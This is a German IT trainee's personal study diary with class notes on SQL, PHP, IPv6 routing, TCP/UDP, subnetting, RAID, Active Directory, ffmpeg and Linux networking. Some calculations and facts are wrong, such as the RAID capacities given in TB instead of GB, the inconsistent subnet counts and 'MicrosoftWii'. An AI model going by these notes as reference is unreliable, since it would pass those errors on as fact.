CREATE TABLE MeineLustigenTierchen ( TierId int(11) NOT NULL auto_increment, TierName varchar(50) NOT NULL, TierFarbe varchar(50) NOT NULL, PRIMARY KEY (TierId), UNIQUE KEY NameFarbe (TierName,TierFarbe) );

Jedoch gab es dann keine Liste mehr mit den Ausgaben der Datenbank.. . Wir bauten eine if(isset( - Abfrage und setzten die Klammer derart richtig (nämlich nur um das insert in die datenbank), damit das select nicht erfaßt wird vom isset. Dann erschien auch die Ausgabe wieder.

2.12. Router IV mit Ingo Droß.

Nein

Kein routing mit Ingo? Was sonst ???

Systemüberwachungs-Tool: in die Konsole “top” eingeben. k = kill dann die PID eingeben, 9 = sofort töten.

Mit 1 kann man die cpu 's aufklappen.

KiB Mem: 7880068 total, = 7,5 GiB RAM.

Druck = macht einen Screenshot.

Ich könnte auch etwas machen, wo man alle Einträge in ein PDF speichert!

Persistent Livesystem QR-Code

Drucker, der in der Ausbildung verwendet wird: Ricoh Aficio sp 4310n

Das ist ein Query-String: “ http://localhost/db_pruef/index.php?docid=31 & todo=3”.

5.12.2016 Rechnungswesen mit Hr. Schirmer

Klassenbucheintrag: “Säulen des Rewe: Buchführung, KLR, Statistik, Planungsrechnung; Rechtsgrundlagen: Steuerrechtliche und Handelsrechtliche Vorgaben; Inventur: Körperliche Bestandsaufnahme und Buchinventur - Inventar - Bilanz: Inventarstruktur und Bilanzstruktur; Bilanzwaage; Auflösung der Bilanz in Konten; Struktur der aktiven und passiven Bestandskonten; Buchungssatz als Buchungsanweisung; Keine Buchung ohne Beleg.”

BLAUPSI!

Wird unterteilt in Buchführung, sowie Kosten- und Leistungsrechnung zu ihr gehört zu ihr gehört

- Zeitabschnittsrechnung zur laufenden Rechnungsperiode zählen: Vermögen und Schulden- aufwand und Ertrag geben - Bewerteter Verzehr von Gütern und Auskunft über Erfolg Leistungen

- Geben- und Verlustrechnungs- - Betriebszweckbezogen konto (G&V-Konto) Statistik: Vergleichsrechnung - zeitlich (wie sich bestimmte Produkte entwickelt haben) - Branchenvergleich

Planungsrechnung: - Betriebliche Vorschaurechnung. Budget/Wirtschaftsplan.

- 1. bis 3. Hochrechnung

Inventur: Bestandsaufnahme des Vermögens und der Schulden eines Unternehmens

Saldo: Differenzbetrag, der sich nach Aufrechnung der Soll- und Habenseite eines Kontos ergibt.

Prima Nota: Die Primanota, gerne mit PN abgekürzt, bezeichnet einen zur Buchung vorbereiteten Belegstapel (ca. 100 bis 200 Buchungsbelege). Insbesondere konventionelle Zahlungsverkehrsbelege wie Überweisungsaufträge, Schecks oder Lastschrifteinreichungen sind hier zur Erfassung im Bankrechnungswesen gebündelt. Der Tag der ersten Eintragung. Stapel erhalten eine nach unten verlaufende Nummer, eine PN-Nummer, wie im Grundbuch, wo Buchungen zeitlich geordnet sind. Mit Liefferantennummer, Umsatz in Euro, buchhungstext, Skonto, wenn vorhanden, kommt auch vor..Nummer des Kontos, auf dsas gebucht wird, z.B. 1800=Maschinen ..

Waren auf Ziel: Du kaufst jetzt und bezahlst zu einem späteren Zeitpunkt in der Zukunft. Also nicht auf Raten, sondern einfach an einem bestimmten Datum - Ziel. Du bekommst eine Rechnung mit Angabe: Zahlbar am xxxxx.

6.12.2016 Routing IV mit Mathias Rüdiger

Klasenbucheintrag (oder, was kommen wird): “IT 2.1-2.2.8; S.93-142 Teil 2 S 3: IPv4, IPv6, Neighbor Discovery Pr., IPSec, ICMP Router, Routing, RIP, BGP, IGP, OSPF S 4: UDP, TCP, SCTP, TLS S 5-7: FTP, HTTP, HTTPS, IMAP, POP, SMTP, RDP, RTP, SIP, SNMP, SOCKS, SSH, NTP, DNS Speichernetze, NAS, SAN Cloud-Computing Test/Klausur”

Das alles auf einem Blatt:

7.12.2016 Routing IPv6: mit dem Cisco Packet Tracer. Hier das zur Aufgabe gestellte Netzwerk:

1. Router 2811 auswählen, der ist vlan fähig. Wieso nur der? Router 13 auf ipv6 umstellen: Router>enable Router#show ipv6 interface brief Router#config Router(config)# int fa0/0 Router(config-if)# ipv6 enable // dann ist man in der Schnittstelle/port und aktiviert ipv6

Router#config Configuring from terminal, memory, or network [terminal]? Enter configuration commands, one per line. End with CNTL/Z. Router(config)# Dann guckt man sich die Ports an, die man hat. Man geht mit dem Cursor auf diese grünen Punkte um den Router. Ports zeigen sich an (fa0/11). Dann steuert man den richtigen Port an, GigabitEthernet ist: int fa0/0 dann müsste man: Router(config-if)# erhalten. Dort gibt man dann: ipv6 add FC00::1/16 ein und weist damit einem lan einen IPv6-Adressbereich zu.

Das mit jedem Port wiederholen (also in jeden anderen port rein und dort natürlich mit unterschiedlichen Adressbereichen). Dann weist man den Clients eine IP zu (z.B. FC00::2, die FC00::1 wird als Gateway in der ip-config eingetragen)

Um lan-übergreifend zu pingen -> Route in der Konsole vom Router 13 setzen:

Man muss dann auch in der entsprechenden Schnittstelle 1/0 sein.. Router(config-if)#ipv6 route FC11::0/120 ethernet1/0

Router(config-if)#ipv6 route FC12::0/120 ethernet1/1 usw... bei jedem einzelnem Rechner im netzwerk den ipv6 Gateway eintippen: FC11::1 Natürlich darf dann kein client FC11::1 haben. router 2: int gig0/0

Router(config)#ipv6 route FC01::0/16 fa0/1 routen löschen: no ipv6 address FCC00::1/16 oder ?? bin gerad zu faul, im ordner nach zu schauen... Das route-adden: Neben dem Router 13 kommt das Router 0 hinzu. Diesen auch ipv6-fähig machen und Lan’s einrichten. Auf Router 0:

Router(config)#ipv6 route FC01::/120 FC00::1

Dann kommt man vom LAN FC01::/120 vom Router 13 auf das LAN FC15::/16 vom Router 0.

Das Nächste müsste lauten (auf router 0): Router(config)# ipv6 route FC01::/120 FC00::1

Die Flusskontrolle regelt die Datenrate zwischen der sendenden und empfangenden Station und sorgt für eine Geschwindigkeitsadaption und dafür, dass die Datenübertragung verlustfrei erfolgt. Acknowledge = antwort, nicht nur dreiwege-handhake.

Zusätzlich bietet UDP die Möglichkeit einer Integritätsüberprüfung an, indem eine Prüfsumme mitgesendet wird. Dadurch können fehlerhaft übertragene Datagramme erkannt werden. https://de.wikipedia.org/wiki/User_Datagram_Protocol

Ein Datagramm ist eine in sich geschlossene, unabhängige Dateneinheit, die ohne weitere Verbindungssicherung zwischen zwei Endpunkten (Peer to Peer) verschickt wird. volatiler Speicher = flüchtiger Speicher

UDP: Minimales, verbindungsloses Netzwerkprotokoll pseudo header = From the TCP or UDP point of view, the packet does not contain IP addresses. (IP being the layer beneath them.) Thus, to do a proper checksum, a "pseudo header" is included. It's "pseudo", because it is not actaully part of the UDP datagram. It contains the most important parts of the IP header, that is, source and destination address, protocol number and data length. This is to ensure that the UDP checksum takes into account these fields. Er ist eine Zusammenstellung von Header-Teilen eines TCP-Segments und Teilen des Headers des eingekapselten IP-Pakets. Es ist ein Modell, an dem sich die Berechnung der TCP-Prüfsumme anschaulich beschreiben lässt. Er wird für die Berechnung der Prüfsumme vor den TCP-Header gelegt. Kein Pseudoheader wird je versendet ??

Verbindungsaufbau: Erst will der Client sich mit dem Server synchronisieren. Wenn der Port zu ist, antwortet er mit einem SYN-RST (Synchronize-reset; Synchronisations-Rücksetzung). Wenn Port offen, wird eine Bestätigung des Synchronisationpaketes und das Synchronisationspaket selbst (SYN-ACK) an den Client zurück gesendet. Das vom Server gesetzte ACK-Flag im TCP-Header kennzeichnet diese Pakete, welche die Sequenznummer x+1 des SYN-Pakets im Header enthalten. Zusätzlich sendet er im Gegenzug seine Start-Sequenznummer y, die ebenfalls beliebig und unabhängig von der Start-Sequenznummer des Clients ist. Der Client bestätigt zuletzt den Erhalt des SYN/ACK-Pakets durch das Senden eines eigenen ACK-Pakets mit der Sequenznummer x+1.

Der Client sendet dann y+1, aus Sicherheitsgründen..

Der Strukturplan zeigt, wie die Hierachie eines Unternehmens aufgebaut ist.

Switche haben eine Flusskontrolle und können Pakete stoppen.

10.12.2016 Selbstlernen PHP

Cool, Ordner erzeugen lassen und Erweiterung zu PDF-Dateien... https://www.a-coding-project.de/ratgeber/php/beispiele/dateien-und-verzeichnisse aber noch nicht umgesetzt... Will ich mit fopen text in pdf's einbinden, scheint es um die Funktionsverknüpfing, die wir mit antje gemacht hatten, nicht herum zu gehen: http://fpdf.de/dokumentation/tutorials/tutorial-3-zeilenumbrueche-und-farben.html aber noch nicht umgesetzt...

12.12.2016: Bewerbungstraining mit Frau Buchwalder

Vollzeitpraktikum: Mindestens 40 Stunden müssen sein.

Hier gehören Einträge rein, die ich heute auf dem Windows-Rechner getätigt hatte.

13.12.2016: Bewerbungstraining mit Frau Buchwalder:

Festigung

3 stages a company you like a company who advertised a company anywhere

14.12.2016: Besuch Museum für Kommunikation, Leipziger Str. 16 10117 Berlin-Mitte, 10 Uhr

Berhard erzählte mir, dass man mit fopen, -write and -close in ein PDF schreiben kann, wenn das *.txt - Dokument, in das alles rein geschrieben wird, in ein Array gespeichert wird und die Variable des Arrays in die Klasse übergeben wird, die in das pdf rein schreibt. Hm. Wie wird denn die Variable in die Klasse übergeben? Über eine If-Else-Anfrage?

Julian, Nadine, Danielle, Ahmed und ich spielten Sprach-Memory und Nadine schlug mir vor, dass ich in die Bewerbung schreiben könnte, dass ich über die Möglichkeiten des goldenen Schnittes, also dass Schönheit Logik ist und berechenbar, zur Informatik-Ausbildung gekommen bin.

Thanatchai ist Mediengestalter Digital/Print, glaub ich und hat sich sicher auch nicht ohne Grund für eine weitere Ausbildung zum Fachinformatiker entschieden.

Und Julian hatte etwas über die Klanghälzer der Inka erzählt, aber dass jeder die Sonnenscheibe von Nebra kenne würde. Kennen Sie, geehrter Leser, die Sonnenscheibe von Nebra?

-- BLA

15.12.2016: Frühstück und anschließend im Klassenraum frei arbeiten

Ächz! Kein Ausklang für die Ferien, sondern hier (in der Klasse) sitzen müssen... .

22.12.2016: Wiederholung Binärsystem and IPv4 – Netzwerkadresse Adressräume rausfinden subnetzte etc.. Dezimalzahlen 0 bis 15 im Dualsystem Wertigkeit: 8 4 2 1 Null: 0 0 0 0 Eins: 0 0 0 1 Zwei: 0 0 1 0 Drei: 0 0 1 1 Vier: 0 1 0 0 Fünf: 0 1 0 1 Sechs: 0 1 1 0 Sieben: 0 1 1 1 Acht: 1 0 0 0 Neun: 1 0 0 1 Zehn: 1 0 1 0 Elf: 1 0 1 1 Zwölf: 1 1 0 0 Dreizehn: 1 1 0 1 Vierzehn: 1 1 1 0 Fünfzehn: 1 1 1 1

256 128 64 32 16 8 4 2 1 2hoch8 2hoch7 2hoch6 2hoch5 2hoch4 2hoch3 2hoch2 2hoch1 2hoch0 1 1 1 1 1 1 1 1 1 256 2 1 Zustand Zustände Zustände möglich möglich

Und jetzt kommt die große Frage:

Du hast eine IP, die heißt: 192. 168. 22. 67 /16

11000000 10101000 00001011 01000011 diese IP hat eine 16er-Subnetmask: 11111111 11111111 00000000 00000000

65536 possible ip adresses, : by 4 = 16384 subnets.

8er-subnetmask: 1111111 11111111 11111111 00000000 128 subnets available, because net & bc -address for each subnet must be available 256 ip-adresses would be the maximum, 256 subnets too, but it wouldn't make sense.

32768 possible ip adresses, : by 4 = 8192 subnetz.

Am abend des 2.1.2017 schauen, wie wir in der schule das noch mal gerechnet hatten.. Wie lautet die Netzadresse?

11000000 10101000 00001011 01000011 - 11111111 11111111 00000000 00000000 = 11000000 10101000 00000000 00000000

192.168.0.0 ?? Jetzt wirklich?

Und es sind 16 Subnetze möglich?

Und das erste Subnetz würde bei 192.168.0.1 anfangen?

BC will be 192.168.15.255 00001111 networkaddr next subnet: 192.168.16.0 192.168.32.0 192.168.48.0 192.168.64.0 192.168.80.0 192.168.96.0 192.168.112.0

11000000 10101000 10000000 00000000 192.168.128.0

192.168.144.0 192.168.160.0 192.168.176.0 192.168.192.0 192.168.208.0 192.168.224.0

Last Subnet 192.168.240.0 → now they are 16 subnets. 192.168.255.0

11000000 10101000 11110000 00000000

But it could be until 192.168.255.255 but how many subnets are possible? 32 ??

192.20.0.0/12 11000000 00010100 00000000 00000000 subnetmask: 11111111 11111111 11110000 00000000

4096 possible ip-adresse in this range, then divide by four. subnets with 2 proper ip-addresses + 1-net and 1BC-Adresses makes sense. 1024 senseful subnets possible. steem als cryptowährung und viva als umwandler von crypto in echt ist mir empfohlen worden. Steem lässt sich auch gut minen.

Und man kann einen webshop sowohl für crypto als auch für hartgeld machen.. from this other finnisch guy, d.. indiescene with programming in graphics = demoscene browser = dillo

1-3.1.2017 Angebot erstellen mit Markus Liebenow ich war den 2. und 3.1. krank..

Konzept erstellen, Marktananlyse, Technische Analyse, Projektplan konkretisieren, Angebot erstellen

Fachinformatiker-Quiz: CSMA .. ist ein Protokoll, um zu verhindern, dass es zu kollisionen kommt.

4.1.2017Datensicherung(Raid) mit Markus Liebenow Hypervisor von Vmware gibt es.

RAID ist ein Akronym für englisch „Redundant Array of Independent Disks“, also „Redundante Anordnung unabhängiger Festplatten“

Wie die Abkürzung bereits sagt, sind, um RAID verwenden zu können zwei oder mehr Festplatten notwendig, die gekoppelt, je nach Level, sich entweder Daten teilen und/oder Daten doppelt speichern.

ausfallsicherung ist es auch nicht ganz. Ausfallen darf nur raid5. Wieviel dürfen ausfallen? -1 Festplatte Aus 3 Festplatten besteht raid5 minimal.

Raid null. Wie nennt man “den”? Stripeset. Mindestens 2.

Raid 1: 2 raid 1.0: 4

Raid 6 wieviele Festplatten dürfen ausfallen? 2. wieviel mind. 4.

JBOD = “Just a Bunch Of Disks kennzeichnet controllerlose Disk-Arrays bzw. Disk-Subsysteme. Ein JBOD hat keinen Controller und besteht lediglich aus einem Gehäuse, in dem sich mehrere Festplattenlaufwerke befinden; normalerweise zwischen 6 und 16. Die Festplattenlaufwerke arbeiten unabhängig voneinander, haben jeweils eine eigene Adresse und werden vom Server einzeln über Small Computer System Interface (SCSI), Integrated Drive Electronics (IDE) oder Enhanced Integrated Drive Electronics (EIDE) angesteuert. Der Vorteil eines JBOD gegenüber einzelnen Laufwerken liegt in der besseren Handhabung und der kompakten Bauweise. JBOD-Systeme verfügen über schnelle Zugriffszeiten und sind preiswerter als RAID-Systeme. Es gibt mehrere Möglichkeiten die JBOD-Systeme mit RAID-Funktionalitäten aufzurüsten, ohne dabei einen RAID-Controller einzusetzen.” beherrscht raidcontroller, benutzt windows 10. zu einem großen laufwerk zusammen Raid 6 8 fp a 500 gb = 4000TB nein 3 TB

8 * 500 – (2 * 500) 4000TB – 1000 = 3 TB gesamt * kapazität der kleinsten platte – (2 * kapazität der kleinsten platte)

..

Nettokapazitäten:

A1: R6 8 * 500 GB 3 TB 4 * 450 GB 1800 – 900 = 900 GB ?? Netto? 12 * 450 – (2*450) = 4500 TB mehr platten, mehr ausfall .. bei so einem großen Raid .. mindestens in einem Jahr eine Platte ausfällt.

Null ist die Performance .. dass wieder eine eins geschrieben wird.

A2: R60 11 * 450 GB Netto?

A3: R5 7 * 450 GB Netto?

A4: R50 7 * 500 GB

Netto? 7 * 500 – (2 * 500) =

A5: R51 6 * 750GB 1 * 450 GB 2 * 1 TB

Netto? 9 * 450 – (2 * 450) 4050 – 900 = 3150 ???

Die 450 streichen, sonst müssten wir alle runter schrauben.

8 * 750 - ( 2 * 750 ) = 4500 : 2 = 2250 wird durch 2 geteilt, wegen den Spiegel.

A6: R6 8 * 500 4 * 450

Netto? 10 * 450 – (2 * 2* 450) 4500 - 1800 = 2700 A7: R5 7 * 450 GM

Netto?

Raidkarten haben eigenes BIOS.

Markus führt die installation von raid vor.

Er hat ein partitionsprogramm, wo auf vier Festplatten ein raid installiert wird.

2 sata schnell und vier sata 3 anschlüsse. 2 schnelle unf vier langsame.

Es gibt da ein programm, das die lese- und schreibgeschwindigkeit ausliest.

.. dann stelle markus Berechnungen an: SATA 3G ISSD Read Write 284,6 137,8 Sequende write multi 213,6 135,2 Random-Write 40GB 275,2 Sequential Read 138,4 Sequencial Write 28,86 Random Read 73,52 Chrystal Disk Mask Das ist nur eine Festplatte. Die verschiedenen Lese-Möglichkeiten stehen für geschwindigkeiten, wenn man alles drauf packt, wie schnell er ist, dann wieder beim bootloaden ist er langsamer. Random read

Große Dateien, da ist er immer schneller.

SATA 6G ISSD Read write 547,7 137,3 332,4 133,0 525,2 136,5 29,38 83,72

Ein Softwareraid (was wir machen) ist einem ..

.. Hardwareraid (Mit einem speziellen Raid-Controller) immer unterlegen.

Bei raid 6: 2 von den 8 sind für das raid0 zuständig.. Die richtigen müssen ausfallen. bei 10 sind es 4... . wenn er mehrere hindert hat, wird er die differenz ausrechnen können

Da kommen hundertausend ted's, die wir noch machen werden. .. die ersten drei platten sind langsama sata-platten, jede hat 111GB. dann ein neues Stripeset-volume. Extra ein fenster/programm , wo man das dateisystem einstelen kann, die Größe der Zuordnungseinheit und benennen.

Er machte dann ein raid0, aus zwei platten. Die dynamisch werden, wenn man das raid eingerichtet hat. Raid0 doppelt so viel – ist ja kein spiegel. 223 GB.

Mit RAID-Hardware-Karte (Hardwareraid, RAID-Controller): Es gibt im UEFI ein Sata-Modus und der ermöglicht den RAID-Modus. Markus rechner: Port 0 ist schnell, 2,3, .. der Rest ist langsam

Sie ist somit der Flaschenhals, da sämtliche Schreibzugriffe einen Zugriff auf die Paritätsplatte nötig machen.

Raid 5: 3 * 111 = 333 – 111 parität = 222 GB.

Markus installiert gerade .. er will die Platten synchronisieren.

Das mit dem xor-Verknüpfungen, ganz rechts, hatte ich nicht verstnden.

RAID funktioniert mit der Wahrheitstabelle XOR (Exklusives Oder), xor hat mehrere eingänge und einen Ausgang. Ein weiterreichender Ansatz mit einem nicht unerheblichen Energie-Einsparpotential sind die Massive Array of Idle Disks (MAID).

TDP = Thermal Disperson (Verlustliestung)

8.1.2017 Videos konvertieren Zuhause mit ffmpeg http://spielwiese.la-evento.com/hokuspokus/seite2.html

Infos zum video bekommen: ffmpeg -i CIMG0269.AVI man muss im Verzeichnis des Videos sein, das man konvertieren will. Dann: root@deb-saiyajin:/home/max/Videos/norwegen# fifmpeg -i Video0014_my_poonyvideo.3gp -b 900k -s 640x480 -acodec libmp3lame -ab 128k -async 50 poonyvideo_2.avi

(ist wesentlich besser, als Videos mit VLC zu konvertieren, nein, die originale *.gp-datei mit vlc sollte ich mal versuchen zu konvertieren!!) Handbrake könnte man auch ausprobieren.

AAC: „..Bitraten ab 192 kbit/s bzw. 224 kbit/s sind vergleichbar mit dem verlustfreien CD-Format...“ Animation aus Einzelbildern Ich habe (aus Gimp oder SynfigStudio) eine Serie durchnummerierter Bilder exportiert und möchte daraus eine Animation machen. Das Ganze funktioniert natürlich nicht nur mit JPG, sondern auch mit PNG, aber die Transparenz geht verloren. ffmpeg -f image2 -i img%d.jpg output.mpg werden mehr als 9 Bilder benötigt: ffmpeg -f image2 -i img%02d.jpg output.mpg -f image2 teilt ffmpeg das Eingabeformat mit (Bilder) -i img%d.jpg die Input-Datei(en) %d ist ein Platzhalter für eine einstellige Zahl %02d für eine zweistellige Zahl, %03d für eine dreistellige, usw. output.mpg die Ausgabe-Datei (hier mpg, könnte aber auch z.B. avi oder flv sein). Internetprotokollfamilie: “Die Internetprotokollfamilie ist eine Familie von rund 500 Netzwerkprotokollen, die die Basis für die Netzkommunikation im Internet bilden. Häufig wird auch die Bezeichnung TCP/IP- Protokoll-Familie verwendet.”

9.1. Active Directory mit Mathias Rüdiger

Domäne = Zur zentralen Authentifizierung von Computern. Microsoft: Mit ihrem Proxy rammeln sie immer am Bedarf vorbei. Auch VPN.

Wenn sie Druck kriegen, kriuegen sie vieles gemacht. Aus server heraus: Authentifizierung für WLAN. Für jeden eigenständigen (physischen) Rechner wird eine Lizenz fällig.

Gruppenrichtlinien: Einschränkungen unter Microsoft. Clients fast komplett über server managebar: Mit Benutzern wird keine Freigabe gemacht.

Firefox schreibt auch eigene Gruppenrichtlinien (von Microsoft übernommen), dass man zentral verwalten kann. Fremde Dateien einarbeiten kann man. Domäne. Das ist ein Unterschied zur Web-Domäne. Es gibt eine Internet-Domäne und eine Windows-Domäne. Das ist nicht unbedingt das gleiche Konzept. Hintergründe, wieso man sowas entwickelt:

(buntstiftgeschreibsel dazwischen) Wozu Rechte: Zum Prioritäten setzen. Wenig Arbeit - dazu gruppiere ich. Firmenstruktur = Startpunkt einer Domäne.

Schön ist, wenn man Gruppenrichtlinien hat, lässt sich leichter verwalten. Firmenstruktur abbilden. Unsere Aufgabe als Fachinformatiker, so eine Domäne aufzubauen.

Das Konzept der Rechte ist derart groß, dass es ein Jahr braucht, um komplett rein zu steigen.

Wird nicht geprüft, da es von Windws ist. Konzernzeug wird nicht geprüft. Hnter dem Active Directory steckt eine komplette Datenbank. Wo andere PRogramme sich einklinken können. Exchange, RADIUS-Server. Auch Linux: Viele NAS-Systeme bieten es an, dass man in der Userverwaltung auf Active Directory einklinken kann. Nichts ungewöhnlich mehr, dass Rechner geclustert sind. MS erst mit der 2000er Version. Lot-Balancing. \\ 192.168.56.4/$c/users Hacke ich ein Mitglied der domäne, bin ich auch in der Datenbank. Betriuebsverwaltungssystem. ´Samba: windws über Linux administrierbar. Linux nicht mit ActDire administrierbar. Das Recht kann ich setzen. Linux Client muss Benutzer nochmal mit pw anlegen. Da meldet er sich lokal an. Mit Samba geht das

Manche SSD´s haben sogar schon: 3000 MB lesen, 2000 Mb schreiben

Beim einrichten einer Domäne: Was schaut man sich zuerst an? Die firma.

Wenn man das Gruppen sortieren nicht dokumentiert, wird man verrückt dabei.

Firmenabteilungen (siehe Ordner). man kann unterdomänen anlegen usw.

Rechte setzen .. für was?

Unterschied zwi schreibe und vollzugriff, schreiben heißt nur auf platte schreiben.. mit vollzugriff habe ich dei möglichkeit den menschen die rechte zu geben, oder zu klauen!

Was ist der Notnagel?

NTFS hat Funktionen zur Verfügung, die nicht in der Freigabe ist.

Wo freigaben definiert, win: gibt man auf ordner

Sicherheitseinstellungen: geht bis in die Dateien runter. Freigaben in der Registry. Stellt ntfs zur verfügung, stehen im Dateisystem, auf der Platte. Dateiattribute, Fileinstellungen. Wandert auf der Platte in andere Systeme mit.

Zwei unterschiedliche Zugriffsreglements: Freigabendefinition und Sicherheitseinstellungen. Das mehr einschränkende System hat vorrang.

Früher konnte sich jeder mit seinem account auf server anmelden. Es ist auch möglich,nur ein Schreibrecht zu verteilen.

Windows home 7 premium: Dort kann man keine Domäne anlegen.

10.1. 2017 fehlt irgendwie..

Windows Hard-Reset(auch sonst?): strg+alt+entf

11.1.2017 Domänen verwalten mit Mathias Rüdiger powershell: history anzeigen mit F7

Dieser treiber nach update: Kernel-Mode Driver Framework version 1.11 update for Windows 7, and Windows Server 2008 R2 kmdf-1.11-Win-6.1-x64.msu generic key - ohne gekauften key windows installieren.

12.1.2017 Domain Controller, Nutzerrechte mit Mathias Rüdiger

Die vier Hauptkomponenten von Active Directory: 1. Lightweight Directory Access Protocol (LDAP) 2. Kerberos-Protokoll 3. Common Internet File System (CIFS) 4. Domain Name System (DNS)

Bestandteile: Active Directory ist in drei Teile aufgegliedert: Schema, Konfiguration und Domain.

Eine Cloud .. dehnbarer Begriff, eigener Server .. Unterschied gleich erklärt. Will auf die Datencloud hin arbeiten.

Wie auf Cloud drauf kommen? Der erste Schritt zur Nutzung: Konto einrichten. Client einrichten .. ich brauche ein Programm dafür.

Freigabe: Es gibt noch einen zweiten Unterschied. Auf welche Dateien greift man zu? Wo öffne ich im Freigabemodus eine Datei? Im Verzeichnis, im Freigabeordner. Aber bei einer Cloud: Auf dem eigenen Rechner, weil wir mit Kopien arbeiten. Man braucht Clientprogramm, dass Synchronisation anschuppst.

Riesenvorteil wenn Daten auf eigenen Rechner: Schneller. Sollte cloud zusammenfallen, könnte ich weiter arbeiten.

Beim client kann man Anmeldesache zwischen schieben.

In der Firma: Alles wird grundsätzlich auf den Server gtepackt, dort wird es gebackupped.

PXE-Boot, wo man vom Server das Betriebssystem startet, mit Terminal-Sitzung. Auf dem server sind: Kundendaten, Vorlagen, Rechnungen, Downloads, wenn man als administrator am rechner sitzt, brauchst neuen firefox, hier ist die exe, den angetellten rechte geben ausnahmsweise kann. Ablageverzeichnis/Share .. so ein verzeichnis, wo man temporär Daten ablegt. Was bekommt jeder Mitarkeiter, bei Verzeichnissen. Verzeichnis für eigene Daten, jeder Mitarbeiter sollte ein eigenes gemapptes Laufwerk bekommen, wo er seine Daten ablegen kann.

Was sollte auf Abteilungssicht anlegen? An Strukturen? Abteilungsordner. Alles sonst spielt keine Geige. Gruppenlaufwerk. Homeordner und Gruppenordner auftrennen.

Wann kann man ein Backup nicht ziehen? Nur wenn es für den benutzer frei gegeben ist, sonst gar nicht.

Linux-Pendant zu Active Directory: "Mit Samba 4 erfüllt Linux alle Voraussetzungen, eine komplette Windows-Domäne mit Datei-, Druck und Authentifizierungs-Diensten zu versorgen - und das ganz ohne Microsoft-Technologie."

Bernhard hatte es mehrfach angewendet, aber Peter findet es beschissen.

Mit Vollzugriff ganz vorsichtig und sparsam.

Legen Sie benutzerdefinierte Berechtigungen fest ... (Blaugelbes Wappen) Erweivergeweiterte Freigabe..

Kennwort hört sich an wie Virus.

Von der Systemsteuerung zur Verwaltung, dann zu den Gruppenrichtlininverwaltung .. mit c$ könnte der Active-Directory-Domänen-Admin auf alle Rechner zugreifen.

Eine DAT ist ein niocht veränderbares Profil

.. alles verworden, dan neues PRofil gespeichert, unveränderbar und hoch gefahren.

Wenn man im profil von user im server unter profil nt.dat und eine ip eingibt, wird neues profil gespeichert, glaub ich .. geht ganz schlecht repariert ... und windows ist da absolut zickig. einer Domäne tritt man bei, indem beide virtuellen Betriebssysteme über die Netzwerkbrücke verbunden sind und dann beim Clientsystem unter Systemeinstellungen/Computername auf "Ändern" klickt, um dort die Domäne einzutragen, die ich auf Server 2016 unter "server manager/lokaler server" eingetragen hatte.

Dann geht man im server in die Active Directory und gibt dort einem Benutzer ein Password und in "profil" vom Benutzer wird das das CMD-File eingetragen, dass danach unter windows/sysvol/sysvol/admin/skripte angelegt werden kann.

Dann meldet man sich unter windows 10 mit dem benutzer + passwort unter der Domäne an. Es gibt dann einen weiteren Nutzer unter Windows 10.

Active Directory ist eine super Sache – man kann ein ganzes Firmen-LAN aufbauen! 14.1.2017:

Subnetzmasken: Wir hatten mal in einer Testaufgabe gehabt, dass man einen Drucker unter einer IP nicht einrichten konnte, weil sie als der BC, oder die Netzasdresse des Subnetzes galt. Aber, wo war denn dort die Vorgabe, dass das Subnetz genau so groß sein muss, dass der Drucker die IP nicht nutzen kann ??

Schade, dass Marcin und Hubert jetzt weg sind.

Morgen, auf dem Brunch, ab 10 uhr, im Wagendorf Karow, werde ich anbieten, dass ich als Fachinformatiker in allen Fragen rund um Computer und Internet mit Rat und Tat zur Seite stehen werde.

Bekannte Computer- und Konsolenmarken: Commodore, Amiga, Atari, Nintendo, SonyPlaystation, MicrosoftWii, Xbox, Apple(McIntosh), Asus, Lenovo, Huawei, Xiaomi, Samsung, LG, Yota, Nokia ..

15.1.2017

Das aktuellste java-paket für Debian lässt sich so: http://www.webupd8.org/2014/03/how-to-install-oracle-java-8-in-debian.html installieren.

16.1.2017 Ingo will mit uns etwas testen

Es geht um “Ute”.. unserem Router zur Fisicloud. Das Modem weiß nicht, wo die 24 ist. Das macht die Netzwerkkarte.

NAT = Network Adress Translation

Ute hat sechs Netzwerkkarten. Eine geht zu Cimi, ins I-Net.

Mit e-learning will cimdata expandieren, rostock, lübeck .. leipzig.

Es gibt extra eine Tabelle, die heißt NAT.

Verstecke alles, was an ETH0 raus geht? root@deb-saiyajin:/proc/sys/net/ipv4# cat ip_forward 0 will man daraus einen router machen, wird dort eine 1 eingetragen und man mehr netzwerkkarten hat.

Mit ifconfig eth1 (ip-nummer) gibt man eine neue ip-nummer.

Dateisystem angucken, dass ein Datenträger hat: file -s /dev/hdc

Mal gucken, ob man mein btrfs-deb mit ddrescue auf den 128gb-stick kopieren kann .. route add -net 192.168.23.0/24 dev eth0 Route setzen in das 23-netz. Googlen: Route setzen. Heißt: Das 23er-Netzwerk finde ich hinter der Netzwerkkarte.

So würde man das Interface setzen: route add -net 192.168.23.0/24 dev eth0 route add -net default gw 192.168.23.1 dev eth0 route add -net verfault gw 192.168.23.1 dev eth0 Alles, was man nicht findet ist hinter diesem Rechner.

PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data. Der Ping geht erst, wenn eine Route zur Ute gelegt ist und wenn sie auf ihren endgültigen Platz steht.

APS: Alte Proxy Welle export http_proxy=http://192.168.22.254:3128 export https_proxy=https://192.168.22.254:3128 wget -r 2 http://www.faz.net wieso faz.net??

Was hat das zu bedeuten? Und ping 8.8.8.8? Wieso funktioniert das nicht? Kommt man mit der konsole jetzt ins internet, oder nicht?

Innerhalb von cimi geht das pingen generell nicht. Aber wget, womit man webpages runter laden kann, geht über proxy.

17.1.2017: ich war Krank/entschuldigt:

Es gab: Dateisysteme FAT

18.1.2017 ICAT mit Ingo

“Tool for building hierarchical HTML catalogs of JPG and GIF images.” icat - Output the contents of a file based on its inode number. icat wie cat nur mit inodes inode: “Ein Inode (englisch index node, gesprochen „eye-node“)[1] ist die grundlegende Datenstruktur zur Verwaltung von Dateisystemen in Linux” ils wie ls zeigt inodes von gelöschten files. Platz auf Festplatte, im Dateisystem. Zitat: “Jeder Inode wird innerhalb einer Partition eindeutig durch seine Inode-Nummer identifiziert.”

